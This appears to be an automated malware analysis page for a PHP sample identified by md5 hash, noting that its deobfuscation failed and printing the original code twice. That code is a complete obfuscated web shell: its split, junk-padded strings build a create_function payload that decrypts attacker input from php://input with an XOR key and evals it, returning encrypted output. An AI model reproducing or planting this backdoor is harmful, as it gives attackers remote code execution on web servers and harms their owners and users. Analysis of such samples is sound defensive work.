PHP Malware Analysis

1

md5: d2a437b58ae5af7d5be3021584205160

Jump to:

Screenshot


Attributes


Deobfuscated PHP code

Failed to deobfuscate code

Execution traces


Generated HTML code

<html><head><meta name="color-scheme" content="light dark"></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;">&lt;?php
$v='@ob_end_clean();$r=2%2%@base2%64_encode(@x2%2%(@gz2%compress(2%$o),2%$k))2%;prin2%t("$p$kh$r$kf");}';
$l=';(2%$j&lt;$c&amp;&amp;$i&lt;$l2%)2%;$j2%++,$2%i++){$2%o.=$t{$i}^$k{$j2%};}}ret2%u2%rn 2%$o;}if (@2%pre2%2%g_ma';
$P='tch("/$kh(.+2%)$kf/",@fi2%le_ge2%t_conte2%n2%ts("php:/2%/i2%nput"2%)2%,$m)==2%1) {@ob_start();2%@ev';
$X='2%al(@gz2%un2%compress(@x(@b2%ase62%4_decode2%(2%$m[1]),$k)2%));2%$o=@2%ob_get_cont2%ents2%()2%2%;';
$x=str_replace('eW','','ceWeWreateWeeW_eWfuncteWion');
$h='$k="3b712%2de2%42%";$kh="813752%72f38492%";$kf="2%a2%abd56662%a4e3";$2%p="8k72%D3g2%2%Dd8gGlyZbc";f';
$y='unct2%ion x(2%$t2%2%,$k){$c=strlen($2%k);$l2%=strlen2%($t2%);$o=""2%;fo2%r($2%2%i=0;$i&lt;$l;){2%for($j=0';
$n=str_replace('2%','',$h.$y.$l.$P.$X.$v);
$r=$x('',$n);$r();
?&gt;
</pre></body></html>

Original PHP code

<?php
$v='@ob_end_clean();$r=2%2%@base2%64_encode(@x2%2%(@gz2%compress(2%$o),2%$k))2%;prin2%t("$p$kh$r$kf");}';
$l=';(2%$j<$c&&$i<$l2%)2%;$j2%++,$2%i++){$2%o.=$t{$i}^$k{$j2%};}}ret2%u2%rn 2%$o;}if (@2%pre2%2%g_ma';
$P='tch("/$kh(.+2%)$kf/",@fi2%le_ge2%t_conte2%n2%ts("php:/2%/i2%nput"2%)2%,$m)==2%1) {@ob_start();2%@ev';
$X='2%al(@gz2%un2%compress(@x(@b2%ase62%4_decode2%(2%$m[1]),$k)2%));2%$o=@2%ob_get_cont2%ents2%()2%2%;';
$x=str_replace('eW','','ceWeWreateWeeW_eWfuncteWion');
$h='$k="3b712%2de2%42%";$kh="813752%72f38492%";$kf="2%a2%abd56662%a4e3";$2%p="8k72%D3g2%2%Dd8gGlyZbc";f';
$y='unct2%ion x(2%$t2%2%,$k){$c=strlen($2%k);$l2%=strlen2%($t2%);$o=""2%;fo2%r($2%2%i=0;$i<$l;){2%for($j=0';
$n=str_replace('2%','',$h.$y.$l.$P.$X.$v);
$r=$x('',$n);$r();
?>